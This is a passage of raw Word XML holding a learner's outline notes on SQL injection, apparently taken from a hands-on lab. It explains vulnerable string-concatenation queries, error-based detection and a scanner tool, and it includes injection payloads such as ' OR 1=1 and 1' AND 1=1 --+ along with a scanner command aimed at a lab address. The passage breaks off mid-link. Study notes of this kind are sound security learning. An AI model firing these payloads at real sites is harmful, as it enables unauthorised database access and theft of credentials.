    <w:p w14:paraId="3D7EA90A" w14:textId="3849EB43" w:rsidR="006B39DB" w:rsidRDefault="006B39DB" w:rsidP="00EE7E9D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>In order to choose some data, use SELECT, FROM, WHERE (SELECT an object FROM a database and choose specific data using WHERE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06D33BFD" w14:textId="471BC5B2" w:rsidR="006B39DB" w:rsidRDefault="006B39DB" w:rsidP="006B39DB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>ex. SELECT * FROM colors;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F7C1DA7" w14:textId="4C041037" w:rsidR="006B39DB" w:rsidRDefault="006B39DB" w:rsidP="006B39DB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>SELECT * FROM food WHERE calories &gt; 50;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52EEF229" w14:textId="389C0E46" w:rsidR="006B39DB" w:rsidRDefault="007A6E65" w:rsidP="006B39DB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId35" w:history="1">
        <w:r w:rsidR="006B39DB" w:rsidRPr="00F1758D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.khanacademy.org/computing/computer-programming/sql</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="00A2DB83" w14:textId="2C8452B1" w:rsidR="006B39DB" w:rsidRDefault="006B39DB" w:rsidP="006B39DB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>What is SQLi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B650EF0" w14:textId="7602FC29" w:rsidR="006B39DB" w:rsidRDefault="006B39DB" w:rsidP="006B39DB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>consists of an injection of an SQL query to the remote web application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B90A0D6" w14:textId="232F63B2" w:rsidR="006B39DB" w:rsidRDefault="006B39DB" w:rsidP="006B39DB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>successful injections can read sensitive data from the database (usernames and passwords), modify database data (Add/Delete), execute administration operations on the database (such as database shutdown), RCE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C106F90" w14:textId="751C2082" w:rsidR="006B39DB" w:rsidRDefault="006B39DB" w:rsidP="006B39DB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Server confidentiality put under serious risk and bypass authentication processes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53180613" w14:textId="4BE32785" w:rsidR="006B39DB" w:rsidRDefault="006B39DB" w:rsidP="006B39DB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>inputs such as a single quote or 1=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="646FF686" w14:textId="561DDD40" w:rsidR="00863B03" w:rsidRDefault="00863B03" w:rsidP="006B39DB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Applications often need dynamic SQL queries to display content based on different conditions set by the user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52BDB884" w14:textId="230811A0" w:rsidR="00863B03" w:rsidRDefault="00863B03" w:rsidP="00863B03">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>this leads developers to concatenate user input directly into SQL statement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0798DEE0" w14:textId="5AFA27FE" w:rsidR="00863B03" w:rsidRDefault="00863B03" w:rsidP="00863B03">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>string concatenation becomes the most common mistake that leads to SQL injection vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49DD20E0" w14:textId="7CCC90D8" w:rsidR="00863B03" w:rsidRDefault="00863B03" w:rsidP="00863B03">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ex. </w:t>
      </w:r>
      <w:r w:rsidRPr="00863B03">
        <w:t>$query = "SELECT * FROM users WHERE username='" + $_POST["user"] + "' AND password= '" + $_POST["password"]$ + '";"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EDD9D10" w14:textId="1DFF86F5" w:rsidR="00863B03" w:rsidRDefault="00863B03" w:rsidP="00863B03">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>supply ‘ OR 1=1 and query will return additional info</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2642BF68" w14:textId="785FFA56" w:rsidR="00FF56B3" w:rsidRDefault="00FF56B3" w:rsidP="00FF56B3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>How to Detect SQLi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1513B094" w14:textId="616940C6" w:rsidR="00BC3EF8" w:rsidRDefault="00BC3EF8" w:rsidP="00BC3EF8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Manually</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A06C7C1" w14:textId="20855F31" w:rsidR="00FF56B3" w:rsidRDefault="00FF56B3" w:rsidP="00FF56B3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Most common form</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37A1A44E" w14:textId="00E1ABDF" w:rsidR="00FF56B3" w:rsidRDefault="00FF56B3" w:rsidP="00FF56B3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>abusing a PHP GET parameter ($username, $id) in the URL of a vulnerable web page</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C8B364B" w14:textId="11F42B6A" w:rsidR="00FF56B3" w:rsidRDefault="00FF56B3" w:rsidP="00FF56B3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>usually located in search fields and login pages</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F3236EE" w14:textId="4B5C4672" w:rsidR="00FF56B3" w:rsidRDefault="009A07DA" w:rsidP="00FF56B3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ex. </w:t>
      </w:r>
      <w:r w:rsidR="00FF56B3" w:rsidRPr="00FF56B3">
        <w:t>MACHINE_IP/sqli-labs/Less-1/index.php?id=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="376ADDDF" w14:textId="2996C1CD" w:rsidR="00FF56B3" w:rsidRDefault="009A07DA" w:rsidP="00FF56B3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ex. </w:t>
      </w:r>
      <w:r w:rsidR="00FF56B3" w:rsidRPr="00FF56B3">
        <w:t>MACHINE_IP/sqli-labs/Less-1/index.php?id='</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="255D445C" w14:textId="49727D99" w:rsidR="00FF56B3" w:rsidRDefault="00FF56B3" w:rsidP="00FF56B3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>creates an error</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48493DFC" w14:textId="1DE6C612" w:rsidR="00BC3EF8" w:rsidRDefault="00BC3EF8" w:rsidP="00FF56B3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>indicates id parameter is vulnerable to SQLi and what type of DB is being used</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="394967B9" w14:textId="6237DE5E" w:rsidR="00BC3EF8" w:rsidRDefault="00BC3EF8" w:rsidP="00BC3EF8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Automatically</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="145AB1DD" w14:textId="7AF6E876" w:rsidR="00BC3EF8" w:rsidRDefault="00BC3EF8" w:rsidP="00BC3EF8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Damn Small SQLi Scanner</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D40F352" w14:textId="37CFD8C9" w:rsidR="00BC3EF8" w:rsidRDefault="007A6E65" w:rsidP="00BC3EF8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId36" w:history="1">
        <w:r w:rsidR="00BC3EF8" w:rsidRPr="00F1758D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/stamparm/DSSS</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0C6868D0" w14:textId="5578E274" w:rsidR="00BC3EF8" w:rsidRDefault="00BC3EF8" w:rsidP="00BC3EF8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>syntax – python3 dsss.py -u</w:t>
      </w:r>
      <w:r w:rsidR="00A72C0B">
        <w:t xml:space="preserve"> “URL”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="199455AF" w14:textId="05526BC4" w:rsidR="00A72C0B" w:rsidRDefault="00A72C0B" w:rsidP="00A72C0B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ex. </w:t>
      </w:r>
      <w:r w:rsidRPr="00A72C0B">
        <w:t>python3 dsss.py -u 10.10.169.12/sqli-labs/Less-1/index.php?id=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45FCEC5C" w14:textId="7B23F0E1" w:rsidR="00A72C0B" w:rsidRDefault="00A72C0B" w:rsidP="00A72C0B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>suIP.biz</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CDCE5C5" w14:textId="18D52F24" w:rsidR="00A72C0B" w:rsidRDefault="007A6E65" w:rsidP="00A72C0B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId37" w:history="1">
        <w:r w:rsidR="00A72C0B" w:rsidRPr="00F1758D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://suip.biz/?act=sqlmap</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="50ADC592" w14:textId="1F3D0EFC" w:rsidR="00A72C0B" w:rsidRDefault="00A72C0B" w:rsidP="00A72C0B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>online sqlmap powered tool that allows fast SQLi check</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04749259" w14:textId="74219661" w:rsidR="00A72C0B" w:rsidRDefault="00A72C0B" w:rsidP="00A72C0B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Error Based SQLi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4792F216" w14:textId="02D47B41" w:rsidR="00A72C0B" w:rsidRDefault="00A72C0B" w:rsidP="00A72C0B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>SQL injection technique that relies on error messages which are used to retrieve any sensitive information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C892A48" w14:textId="48B4CD48" w:rsidR="00A72C0B" w:rsidRDefault="00A72C0B" w:rsidP="00A72C0B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>sometimes self sufficient in enumerating entire DB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B342337" w14:textId="66667191" w:rsidR="00A72C0B" w:rsidRDefault="00A72C0B" w:rsidP="00A72C0B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Approach</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="729717EF" w14:textId="6EB65D84" w:rsidR="00A72C0B" w:rsidRDefault="00A72C0B" w:rsidP="00A72C0B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>fuzz SQLi vulnerable link</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="652E94C0" w14:textId="7CCFDD52" w:rsidR="00A72C0B" w:rsidRDefault="00A72C0B" w:rsidP="00A72C0B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Manual </w:t>
      </w:r>
      <w:r w:rsidR="00F40676">
        <w:t>Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40F556AD" w14:textId="768BF627" w:rsidR="00A72C0B" w:rsidRDefault="00F40676" w:rsidP="00A72C0B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>numbers = try varied inputs, especially large numbers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="726F2283" w14:textId="76C452D5" w:rsidR="00F40676" w:rsidRDefault="00F40676" w:rsidP="00A72C0B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>“ ‘ “ = see where values are placed within quotes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64AAB641" w14:textId="2F0D0179" w:rsidR="00F40676" w:rsidRDefault="00F40676" w:rsidP="00F40676">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>inputs closed around single quotes can be closed easily and followed up with custom commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20FE5234" w14:textId="252FF613" w:rsidR="00F40676" w:rsidRDefault="00F40676" w:rsidP="00F40676">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>ex. 1’ AND 1=1 - -+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BFFEBCD" w14:textId="53649A49" w:rsidR="00F40676" w:rsidRDefault="00F40676" w:rsidP="00F40676">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>1’ - breaks the SQL query</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26DBCBED" w14:textId="606A871E" w:rsidR="00F40676" w:rsidRDefault="00F40676" w:rsidP="00F40676">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>AND 1=1 – SQL code (always true)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71CE7EDC" w14:textId="1133DAF2" w:rsidR="00F40676" w:rsidRDefault="00F40676" w:rsidP="00F40676">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">“- - +” </w:t>
      </w:r>
      <w:r w:rsidR="005B41AF">
        <w:t>–</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005B41AF">
        <w:t>Fixes the query, making SQL code part of it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D632665" w14:textId="7B64F645" w:rsidR="005B41AF" w:rsidRDefault="005B41AF" w:rsidP="005B41AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>First find link or input where an error can be created</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B48B950" w14:textId="3B390AFB" w:rsidR="005B41AF" w:rsidRDefault="005B41AF" w:rsidP="005B41AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>input random intems like single and double quotes, slashes, and backslashes to ascertain common pattern and determine structure of SQL query</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="166711E8" w14:textId="76A9F328" w:rsidR="005B41AF" w:rsidRDefault="005B41AF" w:rsidP="005B41AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>exploit app</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E22DD4" w14:textId="4A1EF3D2" w:rsidR="005B41AF" w:rsidRDefault="005B41AF" w:rsidP="005B41AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>payload collection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="207CA857" w14:textId="69C9E688" w:rsidR="005B41AF" w:rsidRDefault="007A6E65" w:rsidP="005B41AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId38" w:anchor="generic-sql-injection-payloads" w:history="1">
        <w:r w:rsidR="005B41AF" w:rsidRPr="00F1758D">
